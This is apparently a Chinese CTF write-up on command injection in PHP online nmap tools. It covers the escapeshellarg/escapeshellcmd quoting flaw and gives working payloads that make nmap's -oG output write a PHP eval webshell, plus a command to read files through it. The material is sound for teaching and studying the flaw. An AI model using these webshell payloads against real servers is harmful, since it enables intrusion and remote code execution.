在线工具注入总结
本题可理解为一种命令注入,凡是依托eval或者字符串执行语句完成的命令执行,如果应用对用户可控的语句信任度过高的话,都会产生注入,由此可总结一些渗透思路。
[网鼎杯2020朱雀组]NMAP
源码
做题中读取到的源码
<?php
require('settings.php');
set_time_limit(0);
if (isset($_POST['host'])):
if (!defined('WEB_SCANS')) {
die('Web scans disabled');
}
$host = $_POST['host'];
if(stripos($host,'php')!==false){
die("Hacker...");
}
$host = escapeshellarg($host);
$host = escapeshellcmd($host);
$filename = substr(md5(time() . rand(1, 10)), 0, 5);
$command = "nmap ". NMAP_ARGS . " -oX " . RESULTS_PATH . $filename . " " . $host;
$result_scan = shell_exec($command);
if (is_null($result_scan)) {
die('Something went wrong');
} else {
header('Location: result.php?f=' . $filename);
}
else:
....................
?>
构造思路
我们注意到我们的查询目标是以参数的形式传上去的
猜解php语句
<?php $nmp="nmap xxxxxx '$POST['query']'"; ?>
当Nmap使用参数 -oG时,能够将扫描的记录输出保存为.txt格式,而且其扫描记录当中一定会包括我们的扫描目标,我们利用这一点将webshell包含到我们指定的文本当中。
' <?=eval($_POST["1"]);?> -oG 1.phtml '
(闭合) 伪造主机地址(实际为webshell) 保存 闭合文本
文件内容
# Nmap 6.47 scan initiated Sat May 8 09:57:24 2021 as: nmap -Pn -T4 -F --host-timeout 1000ms -oX xml/fd001 -oG 1.phtml \ <?= @eval($_POST[1]);?> \\
# Nmap done at Sat May 8 09:57:26 2021 -- 0 IP addresses (0 hosts up) scanned in 1.95 seconds
可以看到:
访问xxx/1.phtml,尝试蚁剑连接木马读取flag文件
相似的题目[BUUCTF2018]OnlineTool
源代码
<?php
if (isset($_SERVER['HTTP_X_FORWARDED_FOR'])) {
$_SERVER['REMOTE_ADDR'] = $_SERVER['HTTP_X_FORWARDED_FOR'];
}
if(!isset($_GET['host'])) {
highlight_file(__FILE__);
} else {
$host = $_GET['host'];
$host = escapeshellarg($host);
$host = escapeshellcmd($host);
$sandbox = md5("glzjin". $_SERVER['REMOTE_ADDR']);
echo 'you are in sandbox '.$sandbox;
@mkdir($sandbox);
chdir($sandbox);
echo system("nmap -T5 -sT -Pn --host-timeout 2 -F ".$host);
}
escapeshellarg和escapeshellcmd导致的漏洞
escapeshellarg
函数的目的:控制传参的数量为1
escapeshellarg() 将给字符串增加一个单引号并且能引用或者转码任何已经存在的单引号,这样以确保能够直接将唯一一个字符串传入函数,包括exec(), system() 执行运算符(反引号)
特别的,在cmd当中单引号包裹的变量不会被解析,而是当作普通字符串处理
然而,此函数并未对双引号做处理,保留了命令注入的可能。
escapeshellcmd
函数的目的:控制执行命令的数量为1
对存在欺骗风险的元字符进行转义处理,插入\
tip:在windows环境下被添加的为"和^
\x0A Line Feed 换行
\xFF
|\?~<>^()[]{}$*
' " 在不配对时也会被转义,对于成对的引号不专义
深入了解可以参考谈谈escapeshellarg参数绕过和注入的问题
例子1:
escapeshellarg先对单引号转义,再用单引号将左右两部分括起来从而起到连接的作用
escapeshellcmd针对第二步处理之后的参数中的\以及a=1'中的单引号进行处理转义
\\被解释成了\
最终效果:
curl 127.0.0.1\ -v -d a=1'
所以应该先用cmd过滤处理,再用arg过滤处理
例子2:
<?php
/*$arg= '<?php eval($_GET["cmd"]);?> -oG a.php ';*/
$arg= "xxxx' webshell";
echo $arg."\n";
$arg = escapeshellarg($arg);
echo $arg."\n";
$arg = escapeshellcmd($arg);
echo $arg."\n";
payload:
' <?php @eval($_GET["cmd"]);?> -oG a.php '
/沙箱/a.php/?cmd=system('cd /;ls -a;cat flag');
814
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
